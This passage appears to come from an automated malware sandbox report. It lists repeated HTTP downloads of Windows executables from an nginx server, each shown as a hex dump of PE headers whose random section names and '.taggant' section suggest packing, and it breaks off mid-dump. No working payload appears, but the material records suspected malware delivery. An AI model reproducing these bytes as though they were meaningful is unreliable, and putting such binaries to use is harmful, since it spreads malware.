00 00 00 f0 00 2f 02 0b 02 06 00 00 16 00 00 00 06 22 00 00 00 00 00 fa 22 00 00 00 10 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 70 22 00 00 04 00 00 bf af 22 00 02 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 2f 22 00 3c 00 00 00 00 60 22 00 f0 01 00 00 00 50 22 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 2f 22 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e0 14 00 00 00 10 00 00 00 16 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 01 22 00 00 30 00 00 00 02 22 00 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 ac 0f 00 00 00 40 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 70 64 61 74 61 00 00 90 00 00 00 00 50 22 00 00 02 00 00 00 1c 22 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f0 01 00 00 00 60 22 00 00 02 00 00 00 1e 22 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 16:47:26 GMTContent-Type: application/octet-streamContent-Length: 6088704Last-Modified: Fri, 07 Feb 2025 15:27:20 GMTConnection: keep-aliveETag: "67a62658-5ce800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 97 69 b8 cb d3 08 d6 98 d3 08 d6 98 d3 08 d6 98 6e 47 40 98 d2 08 d6 98 cd 5a 52 98 ce 08 d6 98 cd 5a 43 98 c7 08 d6 98 cd 5a 55 98 b8 08 d6 98 f4 ce ad 98 d6 08 d6 98 d3 08 d7 98 a0 08 d6 98 cd 5a 5c 98 d2 08 d6 98 cd 5a 42 98 d2 08 d6 98 cd 5a 47 98 d2 08 d6 98 52 69 63 68 d3 08 d6 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 a8 2c b1 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 da 02 00 00 40 01 00 00 00 00 00 00 b0 87 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 87 00 00 04 00 00 06 36 5d 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5b 80 41 00 6f 00 00 00 00 d0 40 00 a0 ae 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 30 87 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 40 00 00 10 00 00 00 c0 40 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 a0 ae 00 00 00 d0 40 00 00 70 00 00 00 d0 40 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 80 41 00 00 02 00 00 00 40 41 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 90 2a 00 00 90 41 00 00 02 00 00 00 42 41 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 64 67 64 64 78 6d 68 00 80 1b 00 00 20 6c 00 00 7e 1b 00 00 44 41 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 6c 78 63 7a 69 61 77 00 10 00 00 00 a0 87 00 00 04 00 00 00 c2 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 87 00 00 22 00 00 00 c6 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 16:47:32 GMTContent-Type: application/octet-streamContent-Length: 2727936Last-Modified: Fri, 07 Feb 2025 16:03:04 GMTConnection: keep-aliveETag: "67a62eb8-29a000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 0a 00 00 00 00 00 00 00 00 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2a 00 00 04 00 00 90 93 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 68 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 68 06 00 00 00 60 00 00 00 04 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 68 63 79 66 6e 71 66 61 00 40 29 00 00 a0 00 00 00 40 29 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 70 61 71 72 71 73 6a 00 20 00 00 00 e0 29 00 00 06 00 00 00 78 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2a 00 00 22 00 00 00 7e 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 16:47:35 GMTContent-Type: application/octet-streamContent-Length: 1781248Last-Modified: Fri, 07 Feb 2025 15:44:43 GMTConnection: keep-aliveETag: "67a62a6b-1b2e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 a2 a9 0c f0 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 74 01 00 00 08 00 00 00 00 00 00 00 c0 46 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 47 00 00 04 00 00 6d 44 1b 00 03 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 c0 01 00 69 00 00 00 00 a0 01 00 4c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 c1 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 01 00 00 20 00 00 00 a4 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 4c 05 00 00 00 a0 01 00 00 04 00 00 00 c4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 c0 01 00 00 02 00 00 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 80 2a 00 00 e0 01 00 00 02 00 00 00 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 66 79 75 78 6c 61 76 00 40 1a 00 00 60 2c 00 00 3c 1a 00 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 6f 6c 6d 6c 75 74 72 00 20 00 00 00 a0 46 00 00 04 00 00 00 08 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 c0 46 00 00 22 00 00 00 0c 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 16:47:41 GMTContent-Type: application/octet-streamContent-Length: 1870336Last-Modified: Fri, 07 Feb 2025 16:43:24 GMTConnection: keep-aliveETag: "67a6382c-1c8a00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 12 25 9e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 66 04 00 00 ae 00 00 00 00 00 00 00 e0 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 4a 00 00 04 00 00 32 23 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 90 05 00 6b 00 00 00 00 80 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 05 00 00 10 00 00 00 8a 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 80 05 00 00 02 00 00 00 9a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 05 00 00 02 00 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 2a 00 00 a0 05 00 00 02 00 00 00 9e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 74 6d 6a 6c 6b 79 66 00 d0 19 00 00 00 30 00 00 c4 19 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 7a 6b 6b 64 79 63 76 00 10 00 00 00 d0 49 00 00 04 00 00 00 64 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 49 00 00 22 00 00 00 68 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 16:47:52 GMTContent-Type: application/octet-streamContent-Length: 2104320Last-Modified: Fri, 07 Feb 2025 16:05:04 GMTConnection: keep-aliveETag: "67a62f30-201c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 d0 49 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4a 00 00 04 00 00 28 a4 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c b9 49 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c b9 49 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 58 04 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 b0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 6b 76 6c 6e 75 77 6d 00 60 19 00 00 60 30 00 00 5e 19 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 6a 66 67 63 67 72 62 00 10 00 00 00 c0 49 00 00 04 00 00 00 f6 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 49 00 00 22 00 00 00 fa 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 16:47:56 GMTContent-Type: application/octet-streamContent-Length: 2104320Last-Modified: Fri, 07 Feb 2025 16:05:04 GMTConnection: keep-aliveETag: "67a62f30-201c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 d0 49 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4a 00 00 04 00 00 28 a4 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c b9 49 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c b9 49 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 58 04 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 b0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 6b 76 6c 6e 75 77 6d 00 60 19 00 00 60 30 00 00 5e 19 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 6a 66 67 63 67 72 62 00 10 00 00 00 c0 49 00 00 04 00 00 00 f6 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 49 00 00 22 00 00 00 fa 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Feb 2025 16:48:07 GMTContent-Type: application/octet-streamContent-Length: 2727936Last-Modified: Fri, 07 Feb 2025 16:03:04 GMTConnection: keep-aliveETag: "67a62eb8-29a000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 0a 00 00 00 00 00 00 00 00 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2a 00 00 04 00 00 90 93 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 68 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 